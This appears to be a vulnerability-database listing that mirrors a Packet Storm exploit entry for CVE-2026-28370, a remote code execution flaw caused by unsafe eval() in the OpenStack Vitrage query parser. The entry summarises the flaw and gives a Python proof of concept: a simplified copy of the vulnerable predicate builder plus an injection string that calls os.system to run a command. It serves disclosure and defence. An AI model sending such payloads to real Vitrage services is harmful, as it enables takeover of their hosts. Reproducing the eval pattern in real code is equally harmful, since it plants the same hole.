Lucene search
K

📄 OpenStack Remote Code Execution

🗓️ 06 Mar 2026 00:00:00Reported by indoushkaType 
packetstorm
 packetstorm
🔗 packetstorm.news👁 214 Views

OpenStack Vitrage RCE via unsafe eval in the query parser; authenticated API users can run Python code.

Related
Code
=============================================================================================================================================
    | # Title     : OpenStack 12.0.1, 13.0.0, 14.0.0, and 15.0.0 Vitrage Query Parser via Remote Code Execution in Unsafe eval() Usage          |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                            |
    | # Vendor    : https://www.openstack.org/                                                                                                  |
    =============================================================================================================================================
    
    [+] Summary    :  CVE-2026-28370 A Remote Code Execution (RCE) vulnerability exists in the query parser of OpenStack Vitrage prior to versions 12.0.1, 13.0.0, 14.0.0, and 15.0.0.
    
    The issue resides in the _create_query_function method located in:
    
    vitrage/graph/query.py
    
    The vulnerability is caused by unsafe use of Python’s eval() function when dynamically constructing query predicates. User-controlled input supplied via the Vitrage API is embedded directly into a string expression that is later executed with eval().
    
    Because the input is not safely sanitized or parsed, an authenticated user with API access can inject arbitrary Python code. This allows execution of system-level commands on the host running the Vitrage service, under the service account privileges.
    
    [+] POC   :  https://www.youtube.com/watch?v=IjBH-hu3UfQ
    
    
    import os
    
    def _evaluable_str(value):
        """Wraps the value in single quotes if it's a string."""
        if isinstance(value, str):
            return "'" + value + "'"
        return str(value)
    
    def create_predicate(query_dict):
        """
        Simplified version of the vulnerable logic.
        It builds a string and passes it to eval().
        """
    
        key, val = list(query_dict['=='].items())[0]
    
        expression = f"(item.get('{key}') == {_evaluable_str(val)})"
        full_cmd = "lambda item: " + expression
        
        print(f"Executing built string: {full_cmd}")
        return eval(full_cmd)
    malicious_payload = "') or __import__('os').system('id > /tmp/hack.txt') or ('"
    
    query = {
        "==": {
            "ANY_KEY": malicious_payload
        }
    }
    
    
    try:
    
        match = create_predicate(query)
    
        match({'ANY_KEY': 'Pwnd By indoushka'})
        
        print("\n[+] Success: Check /tmp/hack.txt for the command output.")
    except Exception as e:
        print(f"\n[-] Failed to execute: {e}")
    
    
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation